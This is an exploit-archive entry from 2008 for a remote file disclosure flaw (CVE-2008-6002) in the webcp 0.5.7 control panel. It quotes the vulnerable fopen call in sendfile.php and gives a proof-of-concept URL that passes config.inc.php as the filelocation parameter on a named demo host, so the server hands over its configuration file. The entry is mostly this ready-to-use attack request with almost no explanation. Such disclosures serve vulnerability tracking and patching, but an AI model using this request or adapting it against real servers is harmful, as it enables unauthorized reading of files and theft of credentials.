webcp 0.5.7 - 'filelocation' Remote File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-09-23 
date_updated: 2016-12-23 
verified: 1 
codes: OSVDB-48516;CVE-2008-6002 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comwebcp-0.5.7.tar.gz

##################################################################################
## webcp 0.5.7 (sendfile.php filelocation) Remote File Disclosure Vulnerability
## Script : http://www.web-cp.net/releases/webcp-0.5.7.tar.gz
## Demo : http://gyrbo.madoka.be/web-cp/
## Vuln :
## }
## if ($tf = fopen($filelocation, "r")) {
## // Date in the past
##################################################################################
## POC :
##      http://gyrbo.madoka.be/web-cp/sendfile.php?filelocation=config.inc.php
## Open By Mozilla Firefox
##################################################################################

# milw0rm.com [2008-09-24]